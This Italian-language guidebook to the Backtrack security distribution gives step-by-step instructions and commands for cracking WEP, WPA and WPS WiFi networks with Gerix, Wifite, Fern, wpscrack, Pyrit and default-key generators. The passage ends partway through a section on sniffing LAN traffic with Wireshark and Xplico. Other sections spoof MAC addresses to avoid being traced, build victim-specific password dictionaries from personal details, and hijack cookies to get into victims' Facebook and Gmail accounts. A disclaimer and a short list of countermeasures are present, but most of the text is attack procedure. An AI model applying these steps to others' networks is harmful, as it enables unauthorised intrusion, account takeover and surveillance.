1
Questo libro, giunto alla seconda versione, parla del sistema
operativo Backtrack, che si focalizza sulla sicurezza dei computer
ed è disponibile sia come Live DVD che come Live USB, In questa
seconda edizione, sono state aggiunte più di 30 pagine, in cui si
parla di nuove tematiche, come il VOIP, il mondo mobile. Sono state
aggiunte descrizioni di nuove applicazioni, che sono state aggiunte
nella versione 5 R3. Tra esse spiccano WiFite e Fern. Backtrack è
possibile installarlo permanentemente sull'hard disk. Sfogliando tra
queste pagine, sarà possibile trovare guide con immagini
dettagliate, sulle principali tematiche della sicurezza, tra cui ricerca
di passwords, analisi di una rete locale e wif i e molte altre. La
struttura del sistema operativo riprende Ubuntu, permettendo così
di avere una aspetto grafico più intuitivo, richiedendo meno
applicativi eseguibili solo dal terminale. L’intento principale di
questo libro, è quello di mettere il luce come spesso la sicurezza
non è presente o comunque sia facile eluderla con semplici
operazioni, eseguibili da chiunque abbia una minima conoscenza
dell’Informatica. Inoltre sfogliando queste pagine, voglio dare
suggerimenti per evitare furti di identità virtuali e documenti presenti
nei dischi rigidi. Sebbene la rete sembri un posto “relativamente”
sicuro, ogni PC connesso ad essa lascia tracce, che possono
essere usate da un eventuale Cracker per portare a termine un
attacco ed entrare, con il vostro aiuto, nel proprio pc, senza che voi
ve ne accorgiate. Questo libro è diviso in capitoli, ognuno dei quali
contiene un argomento ben preciso e cerca di spiegare attraverso
immagini e comandi i vari argomenti; inoltre vi sono veri e propri
esempi sull’utilizzo delle varie applicazione. Tra tutte spiccano
WireShark, Aircrack, Xplico, AutoScan, NMAP e tante altre.
Questo libro è stato scritto interamente da Giacomo Bellazzi, uno
studente della Facoltà di Ingegneria Elettronica e Informatica a
Pavia, appassionato fin da piccolo all’informatica da quando c’era
Windows 95 fino a tempi più moderni con l’avvento del WiFi e dei
2
nuovi mezzi di comunicazione.
Disclaimer importante:
Questo libro è stato scritto SOLO PER FINALITA’ CONOSCITIVE E PER
TESTARE LA PROPRIA RETE. Ricorda così dice l’articolo 615.
Chiunque abusivamente si introduce in un sistema informatico o
telematico protetto da misure di sicurezza ovvero vi si mantiene contro
la volontà espressa o tacita di chi ha il diritto di escluderlo, è punito con
la reclusione fino a tre anni.
3
Sezione 1
4
Dove Scaricare Backtrack
Backtrack è un sistema operativo open source, cioè è libero e
completamente gratuito e chiunque può installarlo sui propri pc e
notebook. Infatti basta un lettore dvd o una porta usb per poter
avviare ed utilizzare il sistema operativo.
Per scaricarlo basta andare sul sito ufficiale http://www.backtracklinux.org/downloads/, compilare in modo facoltativo il piccolo form e
nella successiva pagina, si seleziona il tipo di PC sul quale verrà
installato l’OS. Per una configurazione standard, basta seguire
come nell’immagine presente, cioè per un PC a 32 bit.
in modo facoltativo il piccolo form e nella successiva pagina, si
seleziona il tipo di PC sul quale verrà installato l’OS. Per una
configurazione standard, basta seguire come nell’immagine
5
presente, cioè per un PC a 32 bit.
L’estensione del file scaricato è iso, cioè un formato compresso,
facile da poter masterizzare su DVD o su chiavetta (almeno da
4GB). Il download non sarà dei più veloci vista la dimensione dei
file. Resta tuttavia possibile scaricarlo via torrent, selezionando
l’opportuna casella la momento del download.
6
Sezione 2
7
Come Installare Backtrack
Dopo aver scaricato il sistema operativo Backtrack in formato ISO,
basta masterizzarlo su DVD per poter utilizzarlo fin da subito. La
modalità con cui si utilizza questo OS da DVD prende il nome di
Live DVD, in quanto non si utilizza il disco rigido in modalità
scrittura, ma soltanto in fase di lettura. Una volta inserito il
dischetto, si seleziona invio due volte e si vedrà che il PC sta
caricando alcuni file. Una volta conclusa questa fase di
caricamento, per passare alla modalità grafica più intuitiva, basta
digitare il comando startx. Dopo pochi secondi ci apparirà una
schermata come questa:
Sul desktop, si noterà una icona con scritto “Install Backtrack”.
Questo permette di impostare correttamente il sistema operativo sul
proprio PC o su chiavetta USB. Se anche questa perifica esterna è
possibile installarlo, con la possibilità di visualizzare Backtrack su
8
vari PC. Nelle prime schermate si imposta la regione, l’ora e il tipo
di tastiera. Dopo si giungerà ad una schermata per impostare la
destinazione di installazione.
Se si vuole avere SOLO Backtrack sul disco rigido, bisogna
selezionare “use entire disk”. Qui ci sono due ulteriori impostazioni;
se si vuole l’OS sulla chiavetta USB si utilizza la periferica
appropriata con la relativa impostazione del Boot Loader
(spuntando l’opzione “Installare il boot loder” in/dev/sdb). Se lo si
vuole su il disco rigido del PC, bisogna selezionare l’altra periferica
disponibile ( è facile individuarla per via della dimensione). Se si
vuole ulteriori configurazioni, basta selezionare manuale; è tuttavia
possibile installarlo in “parallelo” con altri sistemi operativi quali
Windows, senza entrare in conflitto tra di loro. Per sfruttare al
meglio le potenzialità di Backtrack, è consigliabile avere a
disposizione almeno 30 GB, mentre su chiavetta USB almeno 4GB.
Una volta installato Backtrack, dopo il riavvio, apparirà una
schermata con scritto login.
Per accedere alla parte grafica, basta digitare “root” invio, “toor”
invio, startx e invio. Root è l’username, toor e la password, startx è
il comando per avviarlo.
A mio giudizio il metodo migliore è quello di installare solo
Backtrack su un disco rigido, per avere più memoria disponibile;
però se uno utilizza più di un PC la cosa migliore è quello di
metterlo su una chiavetta USB, per avere sempre i dati disponibili.
Aggiornare le applicazioni del sistema operativo
9
Per aggiornare le applicazioni del sistema operativo con gli ultimi
pacchetti disponibili, è possibile farlo direttamente da terminale.
Digitiamo i seguenti comandi:
sudo apt-get update
sudo apt-get upgrade
Al primo comando, dovremo inserire la password, poichè ci servono
di diritti di “root” cioè di amministratore del sistema, mentre nel
secondo dovremo semplicemente digitare “y”, che sta ad indicare
yes.
Aggiornare il sistema operativo
Se invece si vuole aggiornare completamente il sistema operativo,
per esempio passare dalla versione R2 alla R3, occorre digitare da
terminale:
apt-get install libcrafter blueranger dbd inundator intersect mercury
cutycapt trixd00r artemisa rifiuti2 netgear-telnetenable jbossautopwn deblaze sakis3g voiphoney apache-users
phrasendrescher kautilya manglefizz rainbowcrack rainbowcrack-mt
lynis-audit spooftooph wifihoney twofi truecrack uberharvest
acccheck statsprocessor iphoneanalyzer jad javasnoop mitmproxy
ewizard multimac netsniff-ng smbexec websploit dnmap johnny
unix-privesc-check sslcaudit dhcpig intercepter-ng u3-pwn binwalk
laudanum wifite tnscmd10g bluepot dotdotpwn subterfuge jigsaw
urlcrazy creddump android-sdk apktool ded dex2jar droidbox smali
termineter bbqsql htexploit smartphone-pentest-framework fern-wifi10
cracker powersploit webhandler
11
Sezione 3
12
La prima intrusione in una rete Wifi
Ormai il termine wifi è entrato nel linguaggio di quasi tutte le
persone che si appassionano all’informatica e non. La maggior
parte delle famiglie che hanno una connessione ad internet, hanno
un router Wifi in casa, per potersi connettere ad internet senza fili in
tutta la casa, senza il bisogno di essere collegati ad un cavo
ethernet, o ancora più “all’antica” al cavo USB. D’altronde gli ISP
(Internet service provider) permettono la vendita/noleggio di questi
dispositivi a prezzi contenuti, che vengono inseriti direttamente
nella bolletta dei vari servizi di telefonia. Non a caso, se si dovesse
fare una scansione delle reti che ci circondano, si nota quasi subito
un altissimo numero di SSID (service set identifier) del tipo AliceXXXXXXXX o Fastweb-X-XXXXXX etc…… Queste reti, sebbene
sembrano protetta da password WPA e WPA2 (Wi-Fi Protected
Access), che sono più sicure delle ormai vecchie WEP, si è
scoperto essere meno sicure di quanto si pensasse; infatti
attraverso un algoritmo, è possibile risalire alla password di default
direttamente dalle cifre che compongono il nome della rete, che è
facilmente ricavabile.
Questa procedura è stata facilitata, grazie allo sviluppo di
applicazioni reperibili anche da dispositivi mobili, quali iOs e
Android. Se invece l’utente ha cambiato la password che gli è stata
fornita, qui le cose si complicano, perchè è necessario un attacco di
bruteforce, in cui si provano tutte le possibile combinazioni di lettere
e numeri o un attacco con un dizionario, che è più limitato dal punto
13
di vista di possibilità di riuscita dell’attacco, ma è sicuramente più
veloce. È invece quasi un gioco da ragazzi craccare una rete con
protezione WEP, perchè il meccanismo di scambio della cifratura
tra la base (che è il router) e il client (che è il pc connesso alla
base) è stato bucato.
Le applicazioni che verranno analizzate in questo capitolo sono
molte, ognuna di esse ha una sua peculiarità e metodo d’utilizzo,
ma tutti sono semplici da utilizzare, anche alla prima volta. In
generale si può brevemente associare ai seguente programmi le
seguente caratteristiche e finalità: Gerix va bene se si vuole
craccare una rete WiFi con protezione WEP, WPA o WPA2 con un
dizionario o “rainbow tables” ma per via dei tempi, non conviene se
si sfruttano delle falle particolari.
Wifite è un programma automatico, nel senso che una volta
impartita la scansione e terminata, in automatico proverà a craccare
reti WEP e WPA anche con meccanismo WPS, cosa che Reaver
ma manualmente. Fern è un programma abbastanza recente che
permette attraverso una grafica di craccare le principali reti WiFi.
Inoltre questo programma supporta il Cookie Hijacker, con cui è
possibile entrare negli account delle vittime, senza che esse se ne
accorgano. Ecco una definizione di questo tipo di attacco, tratta da
wikipedia:
Questa tecnica, più nota come Browser Hijacking (dirottamento del
browser), permette ai dirottatori di eseguire sul malcapitato
14
computer una serie di modifiche tali da garantirsi la visita alle loro
pagine con l'unico scopo di incrementare in modo artificioso il
numero di accessi e di click diretti al loro sito e conseguentemente
incrementare i guadagni dovuti alle inserzioni pubblicitarie (ad es.
banner pubblicitari). Nei motori di ricerca ad esempio, l'hijacking
sfruttando un bug del motore attraverso il redirect lato server,
riesce a sostituirsi al sito "vittima" nei risultati del motore. In pratica
in una ricerca su un motore, cliccando sul collegamento scelto, ci
appare tutt'altra cosa rispetto a quello desiderato.
Altri programmi sfruttano semplicemente la falla presente in alcuni
router rilasciati in comodato d’uso da parte degli ISP. Per esempio
WiRouter KeyRec, il quale inserendo soltanto il nome della rete,
restituisce la password per accedervi.
Gerix:
Craccare una rete wifi, come ho già scritto precedentemente non è
poi così difficile. Se per alcune reti senza fili (vedi quelle dei router
in comodato d’uso da parte dei gestori) è quasi immediato, per
altre non è uguale, ma con Backtrack il compito si semplifica. Su
questo sistema operativo ci sono molti programmi che permettono
di craccare un reti Wifi, ma oggi vedremo quello più veloce e più
intuitivo, senza ricorrere ( o quasi) a comandi da terminali, come
per il programma Aircrack. L’applicativo che useremo si chiama
Gerix Wifi e sfrutta per dir la verità funzionalità di Aircrack, ma con
una veste grafica più semplice. Prima di passare alla parte pratica,
facciamo un po’ di teoria per capire cosa stiamo facendo.
Innanzitutto quando ci connettiamo normalmente alle reti Wifi,
15
utilizziamo la scheda del PC in modalità “attive” mode, cioè capta
solo i pacchetti destinati alla periferica che utilizziamo.
In questo modo i pacchetti delle reti Wifi nelle vicinanze vengono
ignorati, perchè non servono. Invece per utilizzare correttamente la
scheda con Gerix, bisogna utilizzarla in “mode monitor” o “passive
mode”, cioè in grado di intercettare tutti i pacchetti delle rete Wifi
che ci sono nelle vicinanze. Il passo successivo per non lasciare
tracce in giro, è quello di cambiare il proprio mac address ( è un
indirizzo composto da 12 carattere che identifica univocamente una
periferica Wifi) con uno “fake” cioè fasullo. Dopo aver fatto ciò
siamo praticamente coperti da eventuali rintracciamenti. Fatto ciò si
sceglie una rete Wifi di prova per craccarlo. Il consiglio è quello di
farlo su una propria rete, per evitare denunce. Di solito si sceglie
quella più fragile; tra tutte spiccano quelle WEP che in 10 minuti
sono craccabili. Qui si sfrutta il fatto che la password viene più volte
scambiata tra le periferiche connesse alla stessa rete. Mentre per le
WPA servono “dizionari” contenenti tutte le possibili password;
questo perchè non è ancora stata trovata una vera e propria falla
( se non per alcuni tipi di protezione, per esempio TKIP)). Ora che
abbiamo un po’ di teoria passiamo alla pratica!
Per trovare questo applicativo basta andare in BacktrackExploitation Tools-Wireless Exploitation Tools-WLAN ExploitationGerix
16
Per impostare la modalità “passive mode”e per cambiare il mac
address, basta andare nel tab configuration e fare le seguenti
operazioni con questo ordine:
17
1. Set Random Mac address
2. Enable/Disable Monitor Mode
3. Set Random Mac address
Ora abbiamo impostato correttamente i parametri della periferica.
Per selezionare la rete Wifi da attaccare, basta selezionare
“Rescan networks” e da li la si seleziona, ricordando che una
password WEP è più semplice da craccare rispetto ad WPA.
In base alla protezione della rete, si utilizzano diverse “schede”
Se la password è una WEP, bisogna andare nella tab WEP.
18
Per prima cosa si seleziona “Start sniffing and logging”; dopo aver
fatto ciò se ci sono altri pc connessi alla rete se segue la procedura
per ”WEP ATTACKS with clients” se no “no clients. Per i passaggi
successivi basta selezionare passo dopo passo i comandi presenti.
Per quanto riguardo le WPA, la cosa si complica, perchè dovremmo
utilizzare un attacco “dizionario” cioè ricercare la password
presente in file testo che noi abbiamo scaricato dalla rete (basta
digitare su Google).
19
Bisogna sempre far partire l’opzione Start Sniffing e poi WPA
attaccks. Qui per forza ci deve essere un pc già connesso alla rete.
Per avere in forma scritta la password di WEP, dopo circa 20,000
pacchetti ( ci vogliono pochi minuti per ottenerli se c’è una periferica
connessa), basta fare “Decrypt Password”
20
Per una WPA dopo aver inserito il link per il dizionario contenente
tutte le possibili combinazioni di carattere ritenuti opportuni, basta
fare CRACK WPA password.
21
Il test è finito e come potete vedere non è poi così difficile entrare
nelle reti WIFI.
WPA Tester, iWuppy, iWPA, WiRouter KeyRec
22
Se queste istruzioni non vi sono troppo famigliari (fidatevi che sono
semplici), l’operazioni di intrusione, può essere fatta semplicemente
da un cellulare Android o da iPhone.
Per Android l’applicazione principale è WPA Tester,
precedentemente disponibile su Market Store, poi rimossa per
motivi legale, è tuttavia possibile scaricarla digitando su un motore
di ricerca WPA Tester.apk, giusto alla versione 4.0. Apk è
l’estensione per applicazione che girano su Android. Per installarla
basta collegare il telefono al PC e copiare il contenuto. Una volta
aperta, abbiamo due possibilità, o eseguire una scansione o
inserire direttamente il nome della rete senza fili. Le reti craccabili,
sono evidenziati dall’icona verde a sinistra. Poi basta premere
“Prova a connettere” e sarà evidenziata la password per accedere
alla Rete, utilizzabile anche da un PC.
23
Per iOs, cioè per iPhone, iPod touch le applicazioni sono varie. Le
migliore è disponibile soltanto per dispositivi “sbloccati” si chiama
Wuppy ed è possibile scaricarla da Cydia all’indirizzo
http://kerneldelmondo.netsons.org/cydia
24
Il procedimento è lo stesso per WPA Tester, cambia solamente la
parte grafica. Per iPhone non sbloccati, esistono tante applicazioni
a riguardo. La prima che mi viene in mente è iWPA, la quale,
semplicemente digitando il nome della rete, restituisce la password.
In tutti i casi, però, se la password è stata cambiata dall’utente del
router Wifi, questo procedimento non funziona,
poichè sfrutta il fatto che la password generata di default risultati
25
calcolabile attraverso un algoritmo.
Come già ribadito più volte nel corso di queste pagine, molte reti
WiFi dei router in comodato d’uso degli ISP Italiani e non solo, sono
soggette a una grave falla di sicurezza, poiché il recupero della
password è quasi immediato, attraverso il nome della stessa rete o
al massimo attraverso il mac address.
L’unico rimedio, è quello di cambiare il nome della rete WiFi, oppure
di cambiare la password di default ( cosa da fare sempre ). Dopo
l’avvenuta conoscenza di questa falla, sono state sviluppate
26
tantissimi applicazioni per verificare se il proprio router rientra tra
quelli soggetti a questo problema. Le più famoso sono WPA Tester
( per Android ), iWPA ( per iOs ). In questo post si parlerà di una
nuova applicazioni sviluppata in C e quindi universale, che permette
di calcolare le password delle rete WiFi in maniera rapida e
semplice. Il programma si chiama WiRouter KeyRec ed è stato
sviluppato da Salvatore Fresta.
Come utilizzare WiRouter KeyRec per trovare le password delle reti
WiFi dei router degli ISP
Come primo passo, occorre effettuare il download dell’applicazione
dal sito ufficiale, direttamente da questolink . Il file è in formato zip e
pertanto è necessario scompattarlo, attraverso il seguente
comando:
unzip WiRouter_KeyRec_1.1.1
27
Per poter compilare l’applicazione ed eseguirla, occorre postarci
all’interno della directory appena scompattata. Per farlo digitiamo:
cd WiRouter_KeyRec_1.1.1
28
Ora basta semplice compilare un programma in C, composto da più
main e con file oggetto, digitando in sequenza:
./configure
29
sudo make
30
sudo make install
31
Ora che abbiamo completato la fase di installazione, possiamo
finalmente usarlo. Per farlo basta digitare wirouterkeyrec e troviamo
un help, con la relativa sintassi per l’uso corretto.
32
WPSCrack ( sfrutta la falla di autenticazione del WPS )
Wi-Fi Protected Setup (WPS) è uno standard per l'instaurazione di
connessioni sicure su una rete Wi-Fi domestica, creato dalla Wi-Fi
Alliance, e lanciato l'8 gennaio 2007.
Nelle precedenti righe ho già parlato di come molte reti Wifi,
specialmente quelle con protezione WEP e quelle in comodato
d’uso da parte dei vari gestori, siano facilmente vulnerabili.
Recentemente Craig Heffner, esperto di sicurezza in informatica, ha
scoperta un bug davvero importante, su unparticolare tipo di reti
Wifi, quelle dotate della funzionalità WPS.
Questa tecnologia, permette di associare un router e un client,
premendo semplicemente un tasto su entrambi i dispositivi; in
sostanza viene generato in automatico un codice pin, composto da
33
8 caratteri. Fin qui non ci sarebbe nessuna differenza da un
attacco di tipo bruteforce, che impiegherebbe tantissimo tempo per
provare tutte le possibili combinazioni. Però Craig Heffner, ha
notato che questo codice è composto da 2 parti, entrambe
composta da 4 cifre. La prima parte viene generata senza un
algoritmo ben preciso, mentre la seconda è facilmente ricavabile
dalla prima. Così l’attacco si riduce a soli 11.000 tentativi possibili,
un gran risparmio di tempo. Quindi in poche ore, è possibile
ricavare il codice pin da 8 carattere, utile per accedere alla rete Wifi,
con funzionalità WPS. La prima parte, come ho detto, non è una
sequenza logica ben preciso, però quando un client tenta di
richiedere una connessione al Router WPS, quest’ultimo rilascia un
messaggio di errore “EAP-NACK”.
Dalla teoria alla pratica
L’applicativo che ci viene incontro è quello realizzato da Stefan
Viehbock, anch’egli esperto di sicurezza in Informatica.
Per scaricare l’applicazione basta andare al seguente
indirizzohttp://dl.dropbox.com/u/22108808/wpscrack.zip e scaricare
il file. Una volta scompattato e messo in Desktop, si apre il
terminale e si digita:
cd /root/Desktop./ wpscrack.py –iface mon0 –client <mac address
34
della periferica> –bssid <AP MAC address> –ssid <Nome della rete
wifi> -v
Ovviamente bisogna cancellare i caratteri <>. Per ricavare il mac
address della periferica basta digitare da terminale “ifconfig”,
mentre per il Mac address della rete Wifi da attaccare, ci sono
tantissimi modi; quello più semplice è quello di utilizzare Gerix.
Dopo aver eseguito il comando, l’applicazione tenterà di scoprire il
codice PIN. Il tempo richiesto varia a seconda della difficoltà, ma
entro poche ore, sarà possibile ricavarlo.
Wifite ( un tool automatico )
Nelle scorse pagine, ho già parlato di tool che permette di craccare
una rete wifi con pochi e semplici programmi. Addirittura per alcuni
35
reti, per esempio quelle dei router in comodato d’uso ( vedi Alice e
Fastweb in primis ) basta inserire il nome delle rete e le password
viene generata in automatico. Per le altri tipologie di rete, la
procedura risulta leggermente più complesse; con il tool Wifite, però
questo procedura viene fatta in automatico ! Ecco come installare e
come funziona Wifite.
Installazione
Per effettuare l’installazione apriamo il terminale di Backtrack e
digitiamo questo comando:
wget -O wifite.py http://wifite.googlecode.com/svn/trunk/wifite.py
Dal momento che richiede alcuni permessi per utilizzare, per
esempio, la periferica wifi in “mode monitor”, diamo il seguente
comando:
chmod +x wifite.py
36
37
Funzionamento dell’applicazione
Ora che l’applicazione è stata installata correttamente, avviamola
così:
python wifite.py
Ora che l’applicazione è stata avviata, come prima cosa sarà
effettuata una scansione delle reti wifi presenti nel nostro raggio
d’azione. L’operazione richiede poche decine di seconde. Per
interromperla, basta premere i tasti “ctrl+c”; con questo comando
l’applicazione analizzerà i dati, in base alla tipologia di protezione.
Inoltre, nella stessa schermata sarà possibile analizzare la
presenza del protocollo WPS, che, come abbiamo visto nelle
38
scorse puntate, è risultato un punto debole per la protezione delle
stessi reti. Ora siamo pronti per far partire la procedura automatica
del “craccaggio” delle rete.
Possiamo scegliere i craccare singole reti, selezionandole con i
relativi numeri, oppure digitare il comando “all”, per indicarle tutte.
Ora che è partita la procedura, basterà attendere che il programmi
completi le varie operazioni. Un vero gioco da ragazzi ! L’unica nota
da fare riguarda le reti WPA senza WPS. In questo caso,
l’applicazione catturerà in automatico ”handshake” ed effettuerà un
attacco di tipo dizionario. In caso la password non fosse presente in
tale dizionario, la rete potrà “ritenersi sicura”.
Nella prossima schermata verrà mostrata una visuale simile a
quella originale. Nella parte centra è possibile vedere una sorta di
tabella, contenente il nome della rete WiFi, il canale di trasmissione,
il tipo di protezione e il supporto all’autenticazione con il WPS.
39
40
Creazione di un dizionario WPA
Nelle pagine precedenti, abbiamo discusso sui vari metodi per
entrare in una rete Wifi, sottolineando che per le rete WPA, serve,
se non in casi particolari, un dizionario. Ora vedremo come è
possibile crearne uno davvero “speciale”. L’applicazione che
utilizzeremo si chiama Cupp ed è possibile trovarla in ApplicationsBacktrack-Privilege Escalation-Passwords Attacks-Offline AttacksCupp.
Questa applicazione crea un file con estensione .txt, contenenti
centinaia di possibili passwords, che sono collegate direttamente
alla vittima, come per esempio il suo nome, cognome, data di
nascita, nome del figlio etc….
41
Il passo successivo è quello di digitare da linea di comando
./cupp.py -i
Ora dovremo semplicemente compilare in modo interattivo il piccolo
questionario, nel quale dovremo indicare alcuni semplici
informazioni, quali nome, cognome etc.. della persona a cui
dobbiamo eludere qualsiasi tipo di protezione.
42
Una volta completata la parte di compilazione, avremo un file con il
nome della vittima, che sarà il nostro dizionario ! Per aprirlo basta
semplicemente digitare:
cat nomefile.txt
Questo dizionario WPA è davvero perfetto per le persone che
utilizzano password contenti informazioni personali.
Creare dizionario WPA per Alice
Nella sezione precedente, abbiamo visto come entrare in una rete
wireless. In particolare ho sottolineato, come sia facile reperire le
password di una rete wifi di Alice, poichè essa è ricavabile
direttamente dal nome della rete SSID.
Oggi vedremo come applicare questa procedura direttamente dal
PC, utilizzando l’applicazione alicekeygen. Questa applicazione, in
sostanza, crea un dizionario delle possibili passwords in un file di
testo, che verrà utilizzato in un attacco a “dizionario”. Per scaricare
questa applicazione, basta aprire il seguente
link http://code.google.com/p/alicekeygen/downloads/list.
43
Una volta aperta questa pagina, apriamo il alicekeygen-0.3.tar.gz e
scompattiamo il file nella cartella alicekeygen-0.3 nella nostra
scrivania e ci spostiamo in questa cartella direttamente da
terminale.
44
Ora dobbiamo compilare il sorgente in c, digitando da terminale:
gcc alicekeygen.c sha256.c -w o alicekeygen
Ora possiamo finalmente accedere al nostro programma. Prima
45
però, dobbiamo recuperare in sostanza due informazioni utili per
craccare una rete wifi di Alice. La prima è il nome della rete, per
esempio Alice-12345678, la seconda è il BBSD, cioè il suo mac
address di rete. Per trovare queste informazioni, possiamo
utilizzare Gerix o anche semplicemente il tool offerto da Backtrack
per connetterci alla rete. Ora che abbiamo queste informazioni, ci
basta digitare da terminale questa stringa:
./alicekeygen -s Alice-12345678 -m 00:23:8E:01:02:03 -o dict.txt
Dove ./alicekeygen serve per aprire il nostro programma, Alice12345678 è il nome della rete e il numero composto da 12 valori è il
mac address. Ora avremo un file “dict.txt”, che potremo utilizzare
come dizionario per un attacco alla rete wifi di Alice, utilizzando per
esempio Gerix, un tool che abbiamo già visto come si utilizza.
L’unica condizione che ci servirà è quella che la persona che
utilizza questa rete, non abbiamo modificato la password di default.
Fern WiFi Cracker
Sul web e nelle precedenti pagine, sono presenti tantissimi
programmi che permetteno di craccare una rete WiFi; tra cui
spiccano Gerix, Reaver e iWPA. Ma nessuno di essi è completo,
46
per esempio a Gerix manca il supporto al WPS e Reaver sfrutta
soltanto un attacco con la falla di sicurezza del WPS. In queste
prossime pagine verrà illustrato un nuovo programma, davvero
eccezionale sia per la semplicità d’uso sia per le sue funzionalità. Si
chiama Fern WiFi Cracker.
Questo tool è presente nella nuova versione di Backtrack, mentre è
possibile installarlo per gli utenti Ubuntu, semplicemente scaricando
il pacchetto in formato debian e digitare da terminale:
dpkg -i Fern-Wifi-Cracker_1.2_all.deb
Per gli utenti della versione 5 R3 è possibile trovare l’applicazione
al seguente percorso Backtrack/Explotation Tools/Wireless
Explotation Tools/WLAN Explotation/fern-wifi-cracker.
47
Dal momento che questa applicazione viene aggiornata di
frequente, conviene cliccare sul comando “Update” presente a
sinistra. In ogni caso compare una scritta in caso di presenza di una
nuova versione. Ora che l’applicazione è aggiornata, occorre
selezionare la periferica WiFi da utilizzare, nella zona in alto a
destra, seguito da un “refresh”
48
Ora che l’applicazione ha attivato la scheda WiFi in mode monitor e
fatto una scansione delle reti presenti nelle vicinanze, sarà in grado
di indicare i tipi di protezione di tale SSID.
49
Ora, in base all’obiettivo, è possibile selezionare le reti WiFi
protette da WEP oppure da WPA. In entrambi casi, un attacco
sfruttando la falla di sicurezza del WPS è possibile.
50
Reti WEP
Le reti WiFi sono abbastanza semplici da craccare, in quanto la
password WEP, seppur cifrata, è presente direttamente nei
pacchetti IVS che vengono scambiati tra l’Access Point e il client. In
questa applicazione, occorre semplicemente selezionare la rete e
far partire l’attacco, attraverso il comando “Attack”.
Reti WPA e WPA2
51
Per le reti protette con cittografia WPA la questione si complica
leggermente. Tuttavia con un buon dizionario oppure sfruttando il
fatto che la tecnologia WPS sia attiva nel router, è possibile eludere
tale rete ed ottenere in chiaro la password (ovviamente della
propria rete, vero ?).
In pratica, dobbiamo selezionare la rete e verificare di poter
52
ottenere l’handshake, attraverso la deautenticazione di un
client.Una volta fatto partire l’attacco, dobbiamo inserire un
dizionario.
Quello presente all’interno di Backtrack è possibile reperirlo
all’indirizzo Root/pentest/passwords/wordlists. Tuttavia, sul web e
nelle prossime pagine, sarà possibile trova/realizzare dizionari con
un’ottima possibile di riuscita.
53
Sotto la voce Toolbox, è possibile trovare interessanti tool: per
esempio è possibile impostare un mac address fisso quando si
utilizza questa applicazione.
54
Forse più rilevante, è Cookie Hijacker. Questa funzione, permette di
intercettare i cookie scambiati all’interno della LAN oppure WLAN e
accedere, ovviamente abusivamente, nell’aree riservate della
vittima, tra cui Facebook, GMAIL, Twittr etc…. In questo, occorre
semplicemente selezionare la scheda WiFi e far partire l’attacco.
Dopo che saranno scambiati i cookies, sarà possibile effettuare
l’attacco.
55
Per evitare di cadere in trappola è importante utilizzare sessioni
SSL e di collegarsi a reti con protezione WPA2 e magari con
l’isolamento dei client.
Contromisure per evitare intrusioni :
Come utilizzare Pyrit
Un attacco di tipo bruteforce, richiederebbe di per se tanto tempo a
causa del molteplici tentativi che bisogna fare. Tuttavia un ottimo
programma per velocizzare questi tipi di attacchi è Pyrit. Esso
sfrutta la potenzialità della calcolo della scheda video, per diminuire
il tempo dell’operazione. Per verif icare la velocità di calcolo, basta
guardare la seguente immagine.
56
I requisiti sono pochi, basta avere un buon PC e l’handshake
contenuto in file .cap, che si ottiene, per esempio, con AirCrack.
57
All’interno del pacchetto di questa applicazione è possibile, come
test, trovare questi file:
•
dict.gz è una gzip-compressa wordlist
• wpa2psk-linksys.dump.gz è una gzip-compressa dump di
un WPA2-PSK handshake
• wpapsk-linksys.dump.gz è una gzip-compresssa dump a
WPA-PSK handshake
Come primo passo occorre analizzare il pacchetto:
pyrit -r wpapsk-linksys.dump.gz analyze
e l’output sarà:
Ora digitiamo:
pyrit -r wpapsk-linksys.dump.gz -i dict.gz -b 00:0b:86:c2:a4:85
attack_passthrough
Dove 00:0b:c2:a4:85 è il mac address dell’access point.
58
Dopo un po’ di tempo, si avrà questo output:
All’interno del help ti pyrit è possibile trovare varie opzioni, che
permettono di ottenere risultati migliori, a seconda della tipologia di
rete da testare.
Contromisure
Ecco alcune semplici precauzione, per evitare che la propria rete
Wifi diventi vulnerabile:
1) Cambiare la password di default
59
2) La password deve almeno di 10 carattere, tra cui lettere sia
maiuscole che minuscole, numeri e carattere speciali (del tipo @?
^....)
3)La protezione se possibile WPA2 o WPA con cifratura TKIP
4)Disabilitare il rilascio in automatico degli ip (detto DHCP)
5)Utilizzare un filtraggio attraverso i Mac Address (che sono in
sostanza "il documento di riconoscimento" delle periferiche)
6)Controllare periodicamente le periferiche connesse alla rete
7)Nascondere la prova la rete Wifi, facendola diventare “hidden
ssid”, cioè non visibile immediatamente
Tutte queste procedure, possono essere effettuate dalla pagina di
controllo del router. Per individuarla, basta verificare lo stato della
propria periferica o da terminale digitando prima iwconfig, ifconfig.
60
61
In questo capitolo vedremo come analizzare il traffico in una rete
locale, per poter visualizzare in chiaro cosa succede, tra cui siti
visualizzare e tanto altro. Primo di tutto facciamo un po’ di teoria su
come funziona una rete locale. Un PC per poter accedere ad
internet, ha bisogno di un router, che fa da “NAT”, cioè “smista” il
traffico che proviene dall’esterno per re-indirizzarlo alla periferica
che ne ha fatto la richiesta; quindi tutto il traffico generato in una
rete passa per forza dal router, che invia poi le richieste fuori, con
un IP pubblico, mentre il pc ha un IP privato (es. 192.168.xxx.xxx).
Quindi tutti i pc connessi al router, riescono ad intercettare i
pacchetti inviati da altre periferiche. Ora passiamo alla pratica. Uno
dei programmi per analizzare la propria rete si chiama “Wireshark”.
Per farlo partire in modo corretto è meglio da terminale, per potergli
dare i diritti di amministratore. Per farlo basta digitale da terminale:
“Sudo Wireshark”
Una volta digitato questo comando, apparirà una schermata simile
a questa:
62
Per far partire la vera e propria analisi, basta cliccare la prima icona
a sinistra e premere Start sulla periferica “any” in modo tale da non
sbagliarci.
Ora che Wireshark sta svolgendo il suo lavoro, attendiamo qualche
minuto, mentre tutto il traffico viene generato nel LAN (Local Area
Network)
Ora abbiamo un file con estensione .cap, “ricco di informazioni”,
che è pronto da essere analizzato. Per fare ciò ci viene incontro un
applicazione “GUI” cioè grafica molto intuitiva e semplice da usare.
Si chiama Xplico. Per avviarla, basta andare in BacktrackInformation Gathering-Network Analysis-Network Traffic Analysis–
Xplico Web Gui
63
Un volta qui si fa partire la pagina web dedicata
all’indirizzo http://localhost:9876/ e si fa partire la sessione di analisi. Il
nome utente e la password per il login è “xplico”. Dopo aver inserito
le credenziali di default, selezioniamo new case, scriviamo un nome
per identificarlo, selezioniamo il “case” e facciamo partire una “New
Sessione” e nella pagina successiva facciamo un upload del file
.cap creato precedentemente.
64
Dopo pochi istanti (dipende dalla dimensione del file .cap) si
avranno moltissime informazioni sul traffico generato nella rete
locale, tra cui i siti visualizzati, le immagini, gli indirizzi email, le chat
dei vari servizi di messaggistica, praticamente tutto. Questo
